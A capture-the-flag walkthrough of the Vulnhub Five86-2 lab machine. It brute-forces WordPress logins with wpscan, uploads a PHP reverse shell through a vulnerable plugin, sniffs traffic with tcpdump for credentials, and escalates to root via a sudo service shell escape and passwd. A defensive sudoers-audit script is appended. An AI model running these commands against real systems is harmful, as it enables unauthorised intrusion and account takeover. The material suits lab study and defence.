Vulnhub Five86-2 Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.5 -vv

Scanning with dirb:

We need to modify the hosts file to be able to access the WordPress service

Then we scan the host with wpscan --url http://192.168.1.5 -e u

Also we can brute force WordPress: wpscan --url http://five86-2/wp-login.php -P /root/pass/rockyou.txt -U barney

wpscan --url http://five86-2/wp-login.php -P /root/pass/rockyou.txt -U Stephen

Stephen's account has very low privileges, so we log in using barney's account, which has an exploitable plugin installed.

Follow the steps as the file says and make 2 files, one with a reverse shell inside it that connects back to our machine using nc.

echo "<html>hello</html>" > index.html

zip poc.zip index.html php-reverse-shell.php

Open an nc listener on your machine using the IP and port set inside the shell, then visit the link provided:

five86-2//wp-content/uploads/articulate_uploads/poc4/php-reverse-shell.php

The user directories in /home are permission denied when we try to access any of them.

But we could use Stephen's password apollo1 and switch user, and from his id we can see he's in a group pcap. I know pcap is an Ethernet file that we can view with wireshark or tcpdump, so I viewed it with tcpdump -D, then I googled how to put this to work, and the command is timeout 100 tcpdump -w mypcap.pcap -i veth2b14039, but we have to be at /tmp.

Well, I kept listening and listening for a while, then finally we got a hit. Viewing the file:

Now we have user paul and password esomepasswford, let's log in.

Then I had no idea what to do, so I googled it and found this link: https://gtfobins.github.io/gtfobins/service/

Exactly what I needed: sudo -u peter /usr/sbin/service ../../bin/sh

Now I'm peter.

OK, now you just have to type sudo /usr/bin/passwd, give a new password, then su root, and you are root; catch that flag.
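As an added defensive example (not part of the original walkthrough), here is a small sudoers audit that flags the kind of rules this box relies on: a service or passwd entry granted with no argument restriction, which the GTFOBins page above explains is a shell escape. The sample sudoers text and the SHELL_ESCAPE_BINS list are constructed assumptions, not the VM's real configuration.

```python
import re

# Binaries with documented shell escapes on GTFOBins; this box abused
# "service" (path traversal to /bin/sh) and "passwd" (resetting root's
# password). Assumed, partial list.
SHELL_ESCAPE_BINS = {"service", "passwd", "vim", "vi", "less", "more",
                     "find", "awk", "python", "python3", "perl", "env"}

# user host=(runas[:group]) [NOPASSWD:] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?:(?P<nopasswd>NOPASSWD):\s*)?"
    r"(?P<cmds>.+)$")

# Constructed sample sudoers, not the real file from the VM.
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
paul    ALL=(peter) NOPASSWD: /usr/sbin/service
peter   ALL=(root) /usr/bin/passwd
ops     ALL=(root) /usr/sbin/service nginx restart
"""

def audit_sudoers(text):
    """Return one finding per rule that grants ALL, or grants a binary from
    SHELL_ESCAPE_BINS with unrestricted arguments. Rules for root and rules
    that pin the arguments ("service nginx restart") are not flagged."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        m = RULE_RE.match(line) if line else None
        if not m or m.group("who") == "root" or line.startswith("Defaults"):
            continue
        runas = (m.group("runas") or "root").split(":")[0]
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            parts = cmd.split()
            binary = parts[0].rsplit("/", 1)[-1]
            if cmd == "ALL":
                reason = "unrestricted command set"
            elif binary in SHELL_ESCAPE_BINS and len(parts) == 1:
                reason = "%s with unrestricted arguments is a known shell escape" % binary
            else:
                continue
            findings.append({"who": m.group("who"), "runas": runas, "cmd": cmd,
                             "nopasswd": m.group("nopasswd") is not None,
                             "reason": reason})
    return findings

if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print("%(who)s -> %(runas)s: %(cmd)s (%(reason)s)" % f)
```

The fix the audit points at is to pin the arguments in the rule (as the ops entry does) or remove the entry, rather than relying on the target binary to behave.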
